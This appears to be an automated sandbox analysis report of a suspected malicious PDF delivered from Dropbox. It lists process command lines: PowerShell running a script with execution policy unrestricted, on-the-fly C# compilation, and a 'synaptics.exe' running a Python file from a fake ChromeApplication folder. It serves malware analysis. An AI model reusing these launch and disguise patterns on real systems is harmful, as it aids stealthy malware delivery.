                                                                                                                                                                                                    Content-Disposition: attachment; filename="Your Benefits and Role.pdf"; filename*=UTF-8''Your%20Benefits%20and%20Role.pdf
                                                                                                                                                                                                    Content-Security-Policy: sandbox
                                                                                                                                                                                                    Etag: 1731503288153253d
                                                                                                                                                                                                    Pragma: public
                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                    X-Content-Security-Policy: sandbox
                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                    X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                    X-Server-Response-Time: 71
                                                                                                                                                                                                    X-Webkit-Csp: sandbox
                                                                                                                                                                                                    Date: Fri, 15 Nov 2024 08:00:35 GMT
                                                                                                                                                                                                    Server: envoy
                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                    Content-Length: 3986
                                                                                                                                                                                                    X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                    X-Dropbox-Request-Id: 4907934939a44f75805bea417332ed49
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    2024-11-15 08:00:35 UTC3986INData Raw: 25 50 44 46 2d 31 2e 33 0a 33 20 30 20 6f 62 6a 0a 3c 3c 2f 54 79 70 65 20 2f 50 61 67 65 0a 2f 50 61 72 65 6e 74 20 31 20 30 20 52 0a 2f 52 65 73 6f 75 72 63 65 73 20 32 20 30 20 52 0a 2f 43 6f 6e 74 65 6e 74 73 20 34 20 30 20 52 3e 3e 0a 65 6e 64 6f 62 6a 0a 34 20 30 20 6f 62 6a 0a 3c 3c 2f 46 69 6c 74 65 72 20 2f 46 6c 61 74 65 44 65 63 6f 64 65 20 2f 4c 65 6e 67 74 68 20 38 37 39 3e 3e 0a 73 74 72 65 61 6d 0a 78 9c 7d 54 4d 93 d3 3a 10 bc f3 2b e6 08 55 fb 84 bf 3f f6 c6 2e 50 f5 de 2b aa 28 48 c1 85 8b 62 4f 12 b1 b6 14 24 25 a9 fc 7b 66 a4 38 4e c8 2e 27 c7 8e 46 dd d3 dd 33 19 fc f7 2a 11 65 0d 87 57 0f 0b 78 fb 31 85 b4 10 49 02 8b 15 7c 58 f0 a7 34 69 44 db 42 dd 96 22 ad 61 d1 c3 eb 2f 66 40 30 2b 90 1a de f5 7b b4 5e 39 a5 d7 f0 28 c7 ad 54 6b
                                                                                                                                                                                                    Data Ascii: %PDF-1.33 0 obj<</Type /Page/Parent 1 0 R/Resources 2 0 R/Contents 4 0 R>>endobj4 0 obj<</Filter /FlateDecode /Length 879>>streamx}TM:+U?.P+(HbO$%{f8N.'F3*eWx1I|X4iDB"a/f@0+{^9(Tk


                                                                                                                                                                                                    Statistics

                                                                                                                                                                                                    CPU Usage

                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                    Memory Usage

                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                    High Level Behavior Distribution

                                                                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                                                                    Behavior

                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                    System Behavior

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:0
                                                                                                                                                                                                    Start time:03:00:02
                                                                                                                                                                                                    Start date:15/11/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\protected.ps1"
                                                                                                                                                                                                    Imagebase:0x7ff7be880000
                                                                                                                                                                                                    File size:452'608 bytes
                                                                                                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:1
                                                                                                                                                                                                    Start time:03:00:02
                                                                                                                                                                                                    Start date:15/11/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                    Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:3
                                                                                                                                                                                                    Start time:03:00:05
                                                                                                                                                                                                    Start date:15/11/2024
                                                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\o3u40tef\o3u40tef.cmdline"
                                                                                                                                                                                                    Imagebase:0x7ff60c8c0000
                                                                                                                                                                                                    File size:2'759'232 bytes
                                                                                                                                                                                                    MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:4
                                                                                                                                                                                                    Start time:03:00:05
                                                                                                                                                                                                    Start date:15/11/2024
                                                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES949A.tmp" "c:\Users\user\AppData\Local\Temp\o3u40tef\CSCF365B556FF7845F2AC7AB259D83AC6F.TMP"
                                                                                                                                                                                                    Imagebase:0x7ff76c6d0000
                                                                                                                                                                                                    File size:52'744 bytes
                                                                                                                                                                                                    MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:6
                                                                                                                                                                                                    Start time:03:00:35
                                                                                                                                                                                                    Start date:15/11/2024
                                                                                                                                                                                                    Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Document.pdf"
                                                                                                                                                                                                    Imagebase:0x7ff686a00000
                                                                                                                                                                                                    File size:5'641'176 bytes
                                                                                                                                                                                                    MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:7
                                                                                                                                                                                                    Start time:03:00:35
                                                                                                                                                                                                    Start date:15/11/2024
                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\ChromeApplication\synaptics.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\ChromeApplication\synaptics.exe" C:\Users\user\AppData\Local\ChromeApplication\runtime.py
                                                                                                                                                                                                    Imagebase:0x540000
                                                                                                                                                                                                    File size:100'120 bytes
                                                                                                                                                                                                    MD5 hash:8AD6C16026FF6C01453D5FA392C14CB4
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:8
                                                                                                                                                                                                    Start time:03:00:36
                                                                                                                                                                                                    Start date:15/11/2024
                                                                                                                                                                                                    Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                                                                                                                                                                    Imagebase:0x7ff6413e0000
                                                                                                                                                                                                    File size:3'581'912 bytes
                                                                                                                                                                                                    MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:9
                                                                                                                                                                                                    Start time:03:00:36
                                                                                                                                                                                                    Start date:15/11/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                    Imagebase:0x7ff7e52b0000
                                                                                                                                                                                                    File size:55'320 bytes
                                                                                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:10
                                                                                                                                                                                                    Start time:03:00:36
                                                                                                                                                                                                    Start date:15/11/2024
                                                                                                                                                                                                    Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2084 --field-trial-handle=1608,i,15562068496254741247,5473904975598172256,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                                                                                                                                                                    Imagebase:0x7ff6413e0000
                                                                                                                                                                                                    File size:3'581'912 bytes
                                                                                                                                                                                                    MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:14
                                                                                                                                                                                                    Start time:03:00:47
                                                                                                                                                                                                    Start date:15/11/2024
                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\ChromeApplication\synaptics.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\ChromeApplication\synaptics.exe" C:\Users\user\AppData\Local\ChromeApplication\runtime.py
                                                                                                                                                                                                    Imagebase:0x540000
                                                                                                                                                                                                    File size:100'120 bytes
                                                                                                                                                                                                    MD5 hash:8AD6C16026FF6C01453D5FA392C14CB4
                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    Disassembly

                                                                                                                                                                                                    Reset < >

                                                                                                                                                                                                      Executed Functions

                                                                                                                                                                                                      Function 00007FF848F4AACD Relevance: 1.8, Strings: 1, Instructions: 598COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2454223613.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff848f40000_powershell.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 0-3916222277
                                                                                                                                                                                                      • Opcode ID: a5c5004112b503d7d83629dd66a6408458a4ff146972c007ec56cbb44433a8f3
                                                                                                                                                                                                      • Instruction ID: 8df968d5caa611ad5880b6955c1a1589aa203163f2c14fefea5d4755ea334e2a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: a5c5004112b503d7d83629dd66a6408458a4ff146972c007ec56cbb44433a8f3
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 97021831F1C9194FE7A4F72C94156BA73E1EFA8B51F0402BAD05ED72D6DE28AC828345
                                                                                                                                                                                                      Function 00007FF848F49A28 Relevance: 1.4, Strings: 1, Instructions: 166COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2454223613.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff848f40000_powershell.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID: DK_H
                                                                                                                                                                                                      • API String ID: 0-215612014
                                                                                                                                                                                                      • Opcode ID: 34edd4ed9b6adeb79656f1b041e706e7c611be60402ad2eaa5f84ab89f7c53fb
                                                                                                                                                                                                      • Instruction ID: c6d8bea572c7622d0565dbfcd08efa63b839b31a62c3649078284ec166b516b9
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 34edd4ed9b6adeb79656f1b041e706e7c611be60402ad2eaa5f84ab89f7c53fb
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 87418235E0C90E8FE7A8EB2CA4157B976D1EFA8BA0F40057AD41DE32C6DF285C414795
                                                                                                                                                                                                      Function 00007FF848F4B3CA Relevance: 1.4, Strings: 1, Instructions: 146COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2454223613.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff848f40000_powershell.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID: pK_H
                                                                                                                                                                                                      • API String ID: 0-1938855320
                                                                                                                                                                                                      • Opcode ID: 50b729bad0b50ce10df4921f879ac670c782bac6044204a14882c0c904339199
                                                                                                                                                                                                      • Instruction ID: 3b6ec56f49624c798897a616aeb493e5613881cdf1cd96ffbd4370d4bfb28878
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 50b729bad0b50ce10df4921f879ac670c782bac6044204a14882c0c904339199
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8041A731F2C90A5EEA94EBBC58653B953D2EF98B94F45007AD04ED32D7DE2C6C064345
                                                                                                                                                                                                      Function 00007FF848F4A328 Relevance: .6, Instructions: 613COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2454223613.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff848f40000_powershell.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 8277b45ac60d8b360481d0e6210eee75a7153dc1484e63aa7484ad82932464c7
                                                                                                                                                                                                      • Instruction ID: 02c51a7da2fe000b68853b230b5663c6eb63407e82b988a01344873f792d3ef6
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8277b45ac60d8b360481d0e6210eee75a7153dc1484e63aa7484ad82932464c7
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4A222A3460894D8FDB88EF1CC898AA977E1FF69301F1501AAE85ED72A5DB35EC41CB40
                                                                                                                                                                                                      Function 00007FF8490198DD Relevance: .5, Instructions: 489COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2455308057.00007FF849010000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849010000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff849010000_powershell.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: a3ca04e9e366ea9a91034c8242baa0c4f51494aff0e53a5a8693808a910341a2
                                                                                                                                                                                                      • Instruction ID: ffac843c14dc7a0f5bc0618309115565185ad0414ae84d2ad3e7bc4e92dd1c35
                                                                                                                                                                                                      • Opcode Fuzzy Hash: a3ca04e9e366ea9a91034c8242baa0c4f51494aff0e53a5a8693808a910341a2
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2EE11731D0EBC58FEBAAAB3868561B47BE1EF42264F0800FFD059C71D7E91A9C458352
                                                                                                                                                                                                      Function 00007FF848F49C95 Relevance: .5, Instructions: 452COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2454223613.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff848f40000_powershell.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: d795d30801b6aea40ace5ad79325c81873ea199ba36c205517607a311738c35c
                                                                                                                                                                                                      • Instruction ID: 60c5e3dcad3a30751fb822cb8116d100b898d00f828030295a184291459c8693
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d795d30801b6aea40ace5ad79325c81873ea199ba36c205517607a311738c35c
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7DD14631B0EA855FE756E77898156F53BE0EF666A0B0801FBD08DC71E3DE186C068366
                                                                                                                                                                                                      Function 00007FF849015D75 Relevance: .4, Instructions: 428COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2455308057.00007FF849010000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849010000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff849010000_powershell.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 0e8fb71530a8902822399b055102945d29942bbe94bcff3924f92fb22af9f03f
                                                                                                                                                                                                      • Instruction ID: b859946288972a54143cbbe5880ddb26b2b010f6ecd7d6cf4514a8fec666b010
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0e8fb71530a8902822399b055102945d29942bbe94bcff3924f92fb22af9f03f
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 86D10531D1EAC99FEBA6EF6858565B5BBE0EF16394B0800BED04DCB093EA19DC05C351
                                                                                                                                                                                                      Function 00007FF849011035 Relevance: .4, Instructions: 353COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2455308057.00007FF849010000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849010000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff849010000_powershell.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: ff8b2ac4c68923905bbde0bb7764978a0e794762bc25d9c24a6cf4e1fc7f07c0
                                                                                                                                                                                                      • Instruction ID: 4714ff172f515f2b1d62fe1ec693c98abb11d0f90a635a0a86dc41869939b712
                                                                                                                                                                                                      • Opcode Fuzzy Hash: ff8b2ac4c68923905bbde0bb7764978a0e794762bc25d9c24a6cf4e1fc7f07c0
                                                                                                                                                                                                      • Instruction Fuzzy Hash: B1B12731D0EACA9FEBA9EF7858159B57BE0FF56394F0801BBD44CC7093EA1998448351
                                                                                                                                                                                                      Function 00007FF848F4BF6D Relevance: .3, Instructions: 279COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2454223613.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff848f40000_powershell.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 4abf6b6b504075b7110164e01c992f71577f3d54116fb2ec2b1d6f0821fac850
                                                                                                                                                                                                      • Instruction ID: 4f2a9056493fd8d1c4ec647f66f4a680448f0b593d5b1f521f4545e0c229c67f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4abf6b6b504075b7110164e01c992f71577f3d54116fb2ec2b1d6f0821fac850
                                                                                                                                                                                                      • Instruction Fuzzy Hash: AF714631A0CA484FEB59EB2C98556B877E1EFA5740F0402FBD44ED72C7DE28AC428385
                                                                                                                                                                                                      Function 00007FF848F4B075 Relevance: .2, Instructions: 204COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2454223613.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff848f40000_powershell.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: e919163c59381e6bc74130e50dffa9d41dcba673a37c5e55f671dc14131868b6
                                                                                                                                                                                                      • Instruction ID: b9bf4cc167deb89488f03d618922112475b0ee316dfa29cd60bdaa6c0b5c2da7
                                                                                                                                                                                                      • Opcode Fuzzy Hash: e919163c59381e6bc74130e50dffa9d41dcba673a37c5e55f671dc14131868b6
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8251F13061DA894FD7A5EF6CD858A657BE0FF58751B0900BBE489C72A3DB24EC81C781
                                                                                                                                                                                                      Function 00007FF848F4E25E Relevance: .2, Instructions: 175COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2454223613.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff848f40000_powershell.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 11464d2f405f70376bf0485a292748a2bf8a8d2cd7cff5f25db0b66048479574
                                                                                                                                                                                                      • Instruction ID: 60b09aa87765e206b2ee9914242544e659d80a3d19db217a9b083ff8526e9a11
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 11464d2f405f70376bf0485a292748a2bf8a8d2cd7cff5f25db0b66048479574
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4B414531F0DA050FE7A5B73C585A2BA3BD1DFA96A0F0401BBD44DD32E3DE19A8468355
                                                                                                                                                                                                      Function 00007FF848F4E4E0 Relevance: .2, Instructions: 175COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2454223613.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff848f40000_powershell.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: c9be9dbbce76e3b74867bd260c1f0f9682bc99ce66385624e915fade1d417fdd
                                                                                                                                                                                                      • Instruction ID: 9bf6d69c12b2d2d0262391512408d5afe6f9384f0c9d9a6b6b52d61de82fd940
                                                                                                                                                                                                      • Opcode Fuzzy Hash: c9be9dbbce76e3b74867bd260c1f0f9682bc99ce66385624e915fade1d417fdd
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A641C63131981C8FDBE4EB1CE898E6977E1FF6831271505E6E44ACB275DA66DC81CB40
                                                                                                                                                                                                      Function 00007FF848F4A040 Relevance: .2, Instructions: 159COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2454223613.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff848f40000_powershell.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 6ab4c8b4776a0e07bdd2dd4afc1577086c575182e1dc30aae2ce4da520dd6f05
                                                                                                                                                                                                      • Instruction ID: 1586bfc10a5dade41f771741a83b437c85e778368df2d953e083a6e1c02641bf
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6ab4c8b4776a0e07bdd2dd4afc1577086c575182e1dc30aae2ce4da520dd6f05
                                                                                                                                                                                                      • Instruction Fuzzy Hash: E141DE31A1DD4A5FEB98FB2C945867973D1EFA8A90F0401BBC40ED32D6DF28E8428345
                                                                                                                                                                                                      Function 00007FF848F4A100 Relevance: .2, Instructions: 156COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2454223613.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff848f40000_powershell.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: b7ddafa3c2e555baa0ea3e5ad902d104e037dfba23a283194f553bd5bf6db04c
                                                                                                                                                                                                      • Instruction ID: 4de86fff6f651993ff30b5b420b4248ef63cebe7b8496e5511e152e86fe1eea6
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b7ddafa3c2e555baa0ea3e5ad902d104e037dfba23a283194f553bd5bf6db04c
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9D416030B0C90A4FEBA4F72D8445AB537D1EF687A0F24057AD04ED36E6DE29F8818748
